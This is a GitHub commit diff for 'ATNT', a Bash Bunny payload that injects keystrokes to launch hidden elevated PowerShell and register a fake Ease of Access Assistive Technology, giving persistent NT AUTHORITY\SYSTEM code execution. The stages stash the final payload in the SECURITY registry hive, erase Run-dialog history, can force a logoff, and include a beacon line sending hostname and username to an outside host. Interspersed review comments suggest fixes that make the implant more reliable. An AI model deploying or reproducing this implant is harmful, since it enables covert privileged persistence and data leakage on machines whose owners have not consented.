ATNT update: working version (#461)

* Delete stage3.ps1

* Update ATNT to work as intended.

Update ATNT to work as intended. Requires reboot or logoff to fully register AT.

* Remove DONE file in cleanup.

Forgot to remove DONE file. Now also makes sure this file does not exist before running.
pull/462/head
9o3 2021-08-18 17:37:59 +02:00 committed by GitHub
parent 4f6cd4b54d
commit 1efd6a1116
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 136 additions and 104 deletions

View File

@ -0,0 +1,18 @@
# ATNT : Persistent NT AUTHORITY\SYSTEM implant
Uses Windows [Ease of Access Assistive Technology](https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) to persistently run code with NT AUTHORITY\SYSTEM rights.
## Options
### :warning: FORCE_LOGOFF
> Ease of Access Assistive Technologies (ATs) are only callable after a restart or logoff. Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
### :warning: LOCK_ON_USER
> After the AT has been successfully registered (target machine has rebooted or user has been logged off), the AT will be launched when the user first logs in. The AT is ran as User, and thus can not complete its installation. Setting this setting to true will lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once.
### RUN_IMMEDIATELY
> When the AT is first launched as NT AUTHORITY/SYSTEM, the final stage is written to the SECURITY registry hive. Only NT AUTHORITY/SYSTEM has access to this hive. Setting this setting to true will also immediately run the final stage, instead of waiting for a second switch to a Secure Desktop to launch the final stage.
## final_stage.ps1
The final_stage.ps1 file is merged into the second stage. Usage of `@"\n..."@\n` is therefore not possible. Variable definition and usage should be escaped as follows:
```powershell
`$example = 1;
Write-Host `$example;
```
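Review bot: the README does not say what the payload leaves behind on the target; the CLEANUP section of payload.txt only removes the generated `2` file and the DONE marker from the Bash Bunny, while the `atnt` key under `HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs`, the `Configuration` value under `HKCU:\...\Accessibility` and the `PolAtnt` key under `HKLM:\SECURITY\Policy` written by stage2.ps1 all remain, so list those locations in the README so anyone auditing a test host knows where to look. Two wording fixes in the same hunk: "The AT is ran as User" should be "is run", and the LOCK_ON_USER and RUN_IMMEDIATELY entries write the account as "NT AUTHORITY/SYSTEM" with a forward slash while the title uses the correct "NT AUTHORITY\SYSTEM".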

View File

@ -1 +1,2 @@
iwr ('https://example.com/beacon_'+(whoami)) <#([WmiClass]'Win32_Process').Create('powershell -NoE -NoP whoami');#>
iwr ("example.com/{0}:{1}" -f (hostname),(whoami))
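Review bot: the new `iwr` line drops the URI scheme that the old line carried (`https://example.com/...`); `example.com/{0}:{1}` is not an absolute URI, so Windows PowerShell's Invoke-WebRequest rejects it, and on a PowerShell version that does assume a default scheme the beacon would leave as plaintext HTTP instead of HTTPS. Keep the explicit `https://` prefix. Also worth a comment in this file: the README hunk says every `$` in final_stage.ps1 has to be written as backtick-`$` because the file is spliced into a here-string, and this example only gets away without escaping because it uses no variables.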

View File

@ -1,86 +1,75 @@
#!/bin/bash #!/bin/bash
# #
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant # Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) # Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
# To persistently run code with NT AUTHORITY\SYSTEM rights. # To persistently run code with NT AUTHORITY\SYSTEM rights.
# Author: 9o3 # Author: 9o3
# Twitter: @BugBot4 # Twitter: @BugBot4
# Version: 1.0 # Version: 1.1
# Category: Execution # Category: Execution
# Attackmodes: HID, Storage # Attackmodes: HID, Storage
# #
# LED STATUS # LED STATUS
# ========== # ==========
# SETUP.......Generate stage files # SETUP.......Generate stage file
# STAGE1......Run hidden elevated PowerShell window that creates the AT # ATTACK......Run hidden elevated PowerShell window that creates the AT and drops associated code
# STAGE2......Trigger the newly created AT # CLEANUP.....Remove generated files
# STAGE3......Update the newly created AT to run the final stage # FINISH......Finished
# STAGE4......(OPTIONAL) Trigger the updated AT to run the final stage #
# CLEANUP.....Remove generated files # OPTIONS
# FINISH......Finished # =======
# # Final stage configured from included final_stage.ps1 script
# OPTIONS # FORCE_LOGOFF => Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
# ======= # LOCK_ON_USER => Lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once. Doing this starts the AT as NT AUTHORITY/SYSTEM.
# Final stage configured from included final_stage.ps1 script # RUN_IMMEDIATELY => Run the final stage as soon as the AT is ran as NT AUTHORITY/SYSTEM, instead of running it after it has been called from the SECURITY hive.
# run_final_stage => Setting this to false will instead trigger the final stage when the user switches to a Secure Desktop FORCE_LOGOFF=true
run_final_stage=true LOCK_ON_USER=true
RUN_IMMEDIATELY=true
LED SETUP
GET SWITCH_POSITION ######## Generate stage file ########
cd /root/udisk/payloads/ # Alter second stage based on settings & merge final stage.ps1 into second stage
cd $SWITCH_POSITION LED SETUP
sed "s/!SWITCH!/$SWITCH_POSITION/g" stage2.ps1 > 2 GET SWITCH_POSITION
sed '/!FINAL_STAGE!/{ rm /root/udisk/DONE
s/!FINAL_STAGE!//g cd /root/udisk/payloads/$SWITCH_POSITION
r final_stage.ps1 if [ "$RUN_IMMEDIATELY" = true ] ; then
}' stage3.ps1 > 3 RUN_IMMEDIATELY_TEXT='iex `$p'
fi
ATTACKMODE HID STORAGE if [ "$LOCK_ON_USER" = true ] ; then
LOCK_ON_USER_TEXT='rundll32.exe user32.dll,LockWorkStation;'
######## Run hidden elevated PowerShell window ######## fi
# Runs hidden elevated powershell which executes stage2.ps1 if [ "$FORCE_LOGOFF" = true ] ; then
LED STAGE1 FORCE_LOGOFF_TEXT='(Get-WmiObject -Class Win32_OperatingSystem).Win32Shutdown(4)'
QUACK GUI r fi
QUACK DELAY 500
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)" sed -e "s/#RI#/$RUN_IMMEDIATELY_TEXT/g" -e "s/<#LI#>/$LOCK_ON_USER_TEXT/g" -e "s/#FL#/$FORCE_LOGOFF_TEXT/g" -e '/!FINAL_STAGE!/{
QUACK DELAY 200 s/!FINAL_STAGE!//g
QUACK CTRL-SHIFT ENTER r final_stage.ps1
QUACK DELAY 750 }' stage2.ps1 > 2
QUACK LEFTARROW
QUACK DELAY 100 ATTACKMODE HID STORAGE
QUACK ENTER
######## Run hidden elevated PowerShell window ########
######## Trigger the newly created AT ######## # Runs hidden elevated powershell which executes stage2.ps1
# ATs are tirggered by a desktop switch. Secure Desktops launch ATs as NT AUTHORITY\SYSTEM LED STAGE1
# The AT gets and executes stage3.ps1 QUACK GUI r
LED STAGE2 QUACK DELAY 500
QUACK DELAY 1000 QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
QUACK CTRL-ALT DEL QUACK DELAY 200
QUACK DELAY 750 QUACK CTRL-SHIFT ENTER
QUACK ESC QUACK DELAY 1200
QUACK LEFTARROW
######## Update the newly created AT ######## QUACK DELAY 200
# Write the content of final_stage.ps1 to the SECURITY hive, which is only readable as NT AUTHORITY\SYSTEM QUACK ENTER
# Updates the newly created AT to read and execute the final stage from the SECURITY hive until [ -f /root/udisk/DONE ]
LED STAGE3 do
until [ -f /root/udisk/DONE ] sleep 0.2
do done
sleep 0.2
done ######## Remove generated files ########
if [ "$run_final_stage" = true ] ; then # Removes the generated stage file and sync file system
######## Trigger the updated AT ######## LED CLEANUP
# Trigger the updated AT as NT AUTHORITY\SYSTEM and execute the final stage rm 2
LED STAGE4 rm /root/udisk/DONE
QUACK CTRL-ALT DEL sync
QUACK DELAY 750 LED FINISH
QUACK ESC
fi
######## Remove generated files ########
# Removes the generated stages and the DONE file used to indicate the end of the third stage
LED CLEANUP
rm /root/udisk/DONE
rm 2
rm 3
sync
LED FINISH
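Review bot: the `until [ -f /root/udisk/DONE ]` loop has no upper bound, so if stage 2 never writes the marker (UAC prompt dismissed, PowerShell execution blocked, the `label=''BashBunny''` volume lookup failing) the payload sits in the loop forever and the CLEANUP block never runs, leaving the generated `2` file with the fully expanded stage on the udisk; give the wait a cap and fall through to `rm 2; sync` either way. Smaller points in the same hunk: `rm /root/udisk/DONE` at the top of SETUP runs before the file normally exists and prints an error on every run, so `rm -f` is the right call there; the LED STATUS header now lists ATTACK but the code still calls `LED STAGE1`, so one of the two is stale; and the `sed -e "s/#RI#/..."`, `s/<#LI#>/...` and `s/#FL#/...` substitutions are only safe because none of the three option strings contain `/`, `&` or `\`, which deserves a comment next to the `*_TEXT` definitions so a future option value does not silently break the sed expression.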

View File

@ -1,5 +1,5 @@
#Remove latest run entry #Remove latest run entry
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=(gp $p).$m; rp $p $l[0]; sp $p $m $l.Substring(1); $p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);
# Create AT to run next stage # Create AT to run next stage
$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" $at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
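Review bot: `gpv` (Get-ItemPropertyValue) only exists in PowerShell 5.0 and later, so replacing `(gp $p).$m` with `gpv $p $m` here, and using the same alias inside the `StartParams`, `0` and `1` values of the next hunk, drops hosts running PowerShell 4 or older that the previous form handled; if that is intentional, state the minimum PowerShell version in the payload header.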
@ -8,7 +8,45 @@ New-Item -Path $at -Name "atnt" -Force
New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
New-ItemProperty -Path $atnt -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\!SWITCH!\3')-Raw)"",0)(Window.Close))" -PropertyType "String" -Force New-ItemProperty -Path $atnt -Name "StartParams" -Value ("vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP ([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 0)')"",0)(Window.Close))") -PropertyType "String" -Force
# The value of this is ran when the AT is launched.
# If the AT is launched with user privilages, lock the workstation. This trigger the AT to be launched a second time as NT AUTHORITY/SYSTEM.
# When launched as NT AUTHORITY/SYSTEM, the next stage is retrieved from the registry and ran.
New-ItemProperty -Path $atnt -Name "0" -Value @"
if((whoami) -ne 'NT AUTHORITY\SYSTEM'){<#LI#>exit;}
iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 1)
"@
# The value of this is ran when the AT is launched with NT AUTHORITY/SYSTEM rights.
# Uses Set-Alias and short variable names to fit payload in a single registry entry.
New-ItemProperty -Path $atnt -Name "1" -Value @"
`$a = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt";
`$p = gpv `$a 2;
sal nip New-ItemProperty;
sal rip Remove-ItemProperty;
ni -Path "HKLM:\SECURITY\Policy" -Name PolAtnt -Force;
nip -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value `$p -PropertyType "string" -Force;
nip -Path `$a -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force;
rip -Path `$a -Name "2" -Force;
rip -Path `$a -Name "1" -Force;
rip -Path `$a -Name "0" -Force;
#RI#
"@
# The final stage is later written to the SECURITY hive, this hive is only visible by NT AUTHORITY/SYSTEM.
New-ItemProperty -Path $atnt -Name "2" -Value @"
!FINAL_STAGE!
"@
#Add the newly created AT to automatically start on a desktop switch. #Add the newly created AT to automatically start on a desktop switch.
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force;
#Let the Bash Bunny know we're done here & Eject.
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
New-Item -ItemType file $bb"DONE";
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
#FL#
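Review bot: the comment above the `2` value ("this hive is only visible by NT AUTHORITY/SYSTEM") is misleading as placed: `2` holds the complete final stage under `HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt`, which any local user can read, and it stays there in the clear until the `1` script runs as SYSTEM after the reboot or logoff and copies it to `HKLM:\SECURITY\Policy\PolAtnt`; say that the SYSTEM-only property holds only after that move, and that the `0` and `1` scripts themselves are readable in the same window. The `1` script also removes property `1` while it is still executing, which works only because `iex` has already consumed the whole string, so a one-line comment there would stop the next reader from "fixing" the order. Spelling in the new comments: "privilages" should be "privileges", "This trigger the AT" should be "This triggers the AT", and "ran" should be "run" in the three "is ran" / "and ran" comments.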

View File

@ -1,14 +0,0 @@
$payload = @"
!FINAL_STAGE!
"@
New-Item -Path "HKLM:\SECURITY\Policy" -Name "PolAtnt" -Force
New-ItemProperty -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value $payload -PropertyType "string" -Force
# The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes.
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt" -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force
#Let the Bash Bunny know we're done here & Eject.
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
New-Item -ItemType file $bb"DONE";
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
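Review bot: the deletion matches the commit message, and everything stage3.ps1 did (creating `PolAtnt`, writing the SECURITY hive property, rewriting `StartParams`, the DONE marker and the eject) now lives in the `1` value of stage2.ps1, except the comment "The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes", which is the only explanation anywhere in the payload of why `([WmiClass]'Win32_Process').Create` is used instead of running the stage directly; carry that comment over to stage2.ps1 rather than lose it with the file.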